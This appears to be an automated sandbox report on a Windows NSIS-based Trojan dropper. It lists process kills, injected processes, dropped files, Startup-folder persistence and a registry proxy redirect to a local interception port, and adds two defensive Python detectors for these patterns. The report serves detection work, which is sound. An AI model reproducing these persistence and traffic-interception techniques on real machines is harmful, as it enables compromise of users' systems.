Trojan.Generic.14779156_000b647a23
Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 000b647a23034792225a3ab9da073d23
SHA1: fa8475f0d144c280a8bfe66f77fe9be5532ed613
SHA256: 9ba0b90747d5c75e257f34d552b481f70532d837bdb508f4566006691395eb12
SSDeep: 24576:gRpVgU6qc00PhieAdO7gejjdYKmui3zmd:QVgUo00PQlMHdYvM
Size: 816061 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
WMIC.exe:1768
%original file name%.exe:1588
taskkill.exe:1268
taskkill.exe:744
taskkill.exe:572
taskkill.exe:628
taskkill.exe:1200
taskkill.exe:1920
taskkill.exe:1924
taskkill.exe:232
taskkill.exe:1984
taskkill.exe:1776
taskkill.exe:1812
taskkill.exe:1192
taskkill.exe:1584
taskkill.exe:1252
taskkill.exe:1464
taskkill.exe:2016
taskkill.exe:1036
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:1216
taskkill.exe:672
taskkill.exe:1332
taskkill.exe:120
taskkill.exe:1932
taskkill.exe:228
taskkill.exe:388
taskkill.exe:1020
taskkill.exe:1432
taskkill.exe:1280
taskkill.exe:1728
taskkill.exe:1384
taskkill.exe:860
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:2020
taskkill.exe:1008
taskkill.exe:296
taskkill.exe:292
taskkill.exe:680
taskkill.exe:1416
The Trojan injects its code into the following process(es):
qPAyENSREpdiRdy4l7PC.exe:752
winonit.exe:1304
wincheckfe.exe:1024
wcheckf.exe:1312
vchk.exe:1968
getcap.exe:500
internetport3.exe:1980
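The process list above (a WMIC.exe instance that writes a process listing, followed by 42 taskkill.exe instances from the same sample) is the pattern a detection engineer would want to alert on. The following is an added example, not part of the report or of the sample: it runs a sliding-window count of taskkill.exe children per parent over constructed Sysmon-style process-creation events. PIDs 1588 and 1768 are taken from the report; parent PIDs, timestamps and command lines are assumptions.

```python
"""Detect a parent that spawns a burst of taskkill.exe children and also
enumerates processes through WMIC. Added example; events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def _image_name(path):
    """Basename of a Windows image path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_sample_events():
    """Constructed process-creation events. PIDs 1588 and 1768 come from the
    report; parent PIDs, timestamps and command lines are assumptions."""
    t0 = datetime(2013, 2, 13, 10, 0, 0)
    ev = [
        {"ts": t0, "pid": 1588, "ppid": 1000,
         "image": "C:\\a\\sample.exe", "cmdline": "sample.exe"},
        {"ts": t0 + timedelta(seconds=1), "pid": 1768, "ppid": 1588,
         "image": "C:\\WINDOWS\\system32\\wbem\\WMIC.exe",
         "cmdline": "WMIC process get name"},
        # benign: a user killing one hung process from Explorer (PID 400)
        {"ts": t0 + timedelta(seconds=5), "pid": 300, "ppid": 400,
         "image": "C:\\WINDOWS\\system32\\taskkill.exe",
         "cmdline": "taskkill.exe /F /IM notepad.exe"},
    ]
    # 42 taskkill.exe children of PID 1588, one per second
    for i in range(42):
        ev.append({"ts": t0 + timedelta(seconds=2 + i), "pid": 2000 + i,
                   "ppid": 1588,
                   "image": "C:\\WINDOWS\\system32\\taskkill.exe",
                   "cmdline": "taskkill.exe /F /IM target%d.exe" % i})
    return ev


def taskkill_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Return {ppid: peak} for parents whose taskkill.exe children inside any
    `window` reach `threshold`; peak is the largest count seen in one window."""
    by_parent = defaultdict(list)
    for e in events:
        if _image_name(e["image"]) == "taskkill.exe":
            by_parent[e["ppid"]].append(e["ts"])
    hits = {}
    for ppid, times in by_parent.items():
        times.sort()
        peak, j = 0, 0
        for i, t in enumerate(times):
            while times[j] < t - window:   # slide the window start forward
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            hits[ppid] = peak
    return hits


def wmic_process_enum(events):
    """PIDs of WMIC.exe invocations whose command line queries the process class."""
    return [e["pid"] for e in events
            if _image_name(e["image"]) == "wmic.exe"
            and "process" in e["cmdline"].lower()]


def suspicious_parents(events, threshold=5):
    """Parents that both enumerate processes via WMIC and run a taskkill burst."""
    bursts = taskkill_bursts(events, threshold)
    wmic_pids = set(wmic_process_enum(events))
    wmic_parents = {e["ppid"] for e in events if e["pid"] in wmic_pids}
    return {p: bursts[p] for p in bursts if p in wmic_parents}


if __name__ == "__main__":
    evs = build_sample_events()
    print("taskkill bursts:", taskkill_bursts(evs))
    print("WMIC + taskkill parents:", suspicious_parents(evs))
```

The threshold of five taskkill.exe children per minute is a starting point; administrative scripts that clean up a known set of processes will trip it, so pair the burst with the WMIC enumeration (or with the dropped-file indicators later in this report) before alerting.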
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process WMIC.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1418 bytes)
The Trojan deletes the following file(s):
C:\a\ProcessList.txt (0 bytes)
The process qPAyENSREpdiRdy4l7PC.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ckkkp[1].htm (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\qPAyENSREpdiRdy4l7PC.html (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\localhost[1].htm (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ckkk[1].htm (303 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\System.dll (11 bytes)
C:\a\1logff.txt (717 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aqPAyENSREpdiRdy4l7PC.html (303 bytes)
C:\a\vv11111.txt (22012 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\qPAyENSREpdiRdy4l7PC.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aqPAyENSREpdiRdy4l7PC.html (0 bytes)
C:\a\vv11111.txt (0 bytes)
The process winonit.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\avv.txt (2896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\System.dll (11 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uur[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\vv[1].htm (2896 bytes)
The Trojan deletes the following file(s):
C:\a\ahho.txt (0 bytes)
C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp (0 bytes)
The process wincheckfe.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp (0 bytes)
The process wcheckf.exe:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (0 bytes)
The process %original file name%.exe:1588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\FiddlerCore.dll (9485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll (17 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cki[1].htm (11 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uniqueqPAyENSREpdiRdy4l7PC[1].htm (10 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\qPAyENSREpdiRdy4l7PC.exe (3808 bytes)
C:\a\zvchk.txt (3 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\bdcount[1].htm (8 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe (3808 bytes)
C:\a\ukey.ini (27 bytes)
%System%\3215049.bat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll (5289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
C:\a\ver.ini (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll (13 bytes)
C:\a\getcap.exe (10027 bytes)
C:\a\3cMmvL8egY.exe (5873 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
C:\a\73941422.bat (287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll (13 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\uniqueqPAyENSREpdiRdy4l7PC.ini (10 bytes)
C:\a\install.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
The process vchk.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2E.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\vchk[1].htm (1946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns38.tmp (6 bytes)
C:\a\avchk.txt (1946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1E.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2F.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3B.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns36.tmp (0 bytes)
The process getcap.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnE.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsnE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (0 bytes)
The process internetport3.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\logff.txt (717 bytes)
C:\a\loogg2.txt (240 bytes)
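The file activity above has a recognisable shape: each dropped executable unpacks NSIS plugin DLLs (nsExec.dll, inetc.dll, System.dll, KillProcDLL.dll, FindProcDLL.dll, UAC.dll, AccessControl.dll, SimpleFC.dll) into a per-run %Temp%\ns*.tmp directory, fetches further executables through WinINet (they land in the IE cache), writes a batch file into %System% and plants a .lnk in the user's Startup folder. Plugin DLLs alone are what any NSIS installer produces; the combination is what matters. The following classifier is an added example, not report or sample code; the paths are copied from the report with its placeholders kept, and the indicator names and weights are my own.

```python
"""Classify a process's file writes into dropper indicators and score them.
Added example; paths are from the report, indicator names/weights are mine."""
import re

# NSIS plugin DLLs seen in this report (lower-cased for comparison)
NSIS_PLUGINS = {"nsexec.dll", "inetc.dll", "system.dll", "uac.dll",
                "accesscontrol.dll", "simplefc.dll", "pwgen.dll",
                "killprocdll.dll", "findprocdll.dll"}
# plugins whose purpose is to locate or kill other processes
PROCESS_CONTROL_PLUGINS = {"killprocdll.dll", "findprocdll.dll"}

# %Temp%\ns<id>.tmp\<file>: the per-run plugin directory an NSIS installer unpacks
NSIS_TMP_RE = re.compile(r"\\Local Settings\\Temp\\ns[0-9a-z]+\.tmp\\([^\\]+)$", re.I)
IE_CACHE_EXE_RE = re.compile(
    r"\\Temporary Internet Files\\Content\.IE5\\[^\\]+\\[^\\]+\.exe$", re.I)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
SYSTEM_BAT_RE = re.compile(r"^%System%\\[^\\]+\.bat$", re.I)

WEIGHTS = {"nsis_plugin_dll": 1, "nsis_process_control_plugin": 2,
           "exe_downloaded_via_wininet": 3, "startup_folder_lnk": 3,
           "batch_in_system_dir": 2}

# writes of %original file name%.exe:1588, copied from the report
SAMPLE_WRITES_MAIN = [
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll",
    r"C:\a\qPAyENSREpdiRdy4l7PC.exe",
    r"%Program Files%\FastInternet\app.exe",
    r"%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe",
    r"%System%\3215049.bat",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll",
    r"%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp",
]
# writes of winonit.exe:1304, copied from the report
SAMPLE_WRITES_WINONIT = [
    r"C:\a\avv.txt",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\System.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uur[1].htm",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\inetc.dll",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll",
]


def classify_writes(paths):
    """Return {indicator: [paths]} for the writes that match a dropper pattern."""
    found = {}

    def add(tag, p):
        found.setdefault(tag, []).append(p)

    for p in paths:
        m = NSIS_TMP_RE.search(p)
        if m:
            name = m.group(1).lower()
            if name in NSIS_PLUGINS:
                add("nsis_plugin_dll", p)
            if name in PROCESS_CONTROL_PLUGINS:
                add("nsis_process_control_plugin", p)
        if IE_CACHE_EXE_RE.search(p):
            add("exe_downloaded_via_wininet", p)
        if STARTUP_LNK_RE.search(p):
            add("startup_folder_lnk", p)
        if SYSTEM_BAT_RE.search(p):
            add("batch_in_system_dir", p)
    return found


def dropper_score(paths):
    """Sum of indicator weights; plugin DLLs on their own stay below any
    sensible alert threshold, persistence or a fetched executable push it over."""
    return sum(WEIGHTS[k] for k in classify_writes(paths))


if __name__ == "__main__":
    for label, writes in (("main", SAMPLE_WRITES_MAIN), ("winonit", SAMPLE_WRITES_WINONIT)):
        print(label, dropper_score(writes), sorted(classify_writes(writes)))
```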
Registry activity
The process WMIC.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 ED 30 5B 30 38 BE 3C 03 F8 A6 59 79 B8 71 2A"
The process qPAyENSREpdiRdy4l7PC.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
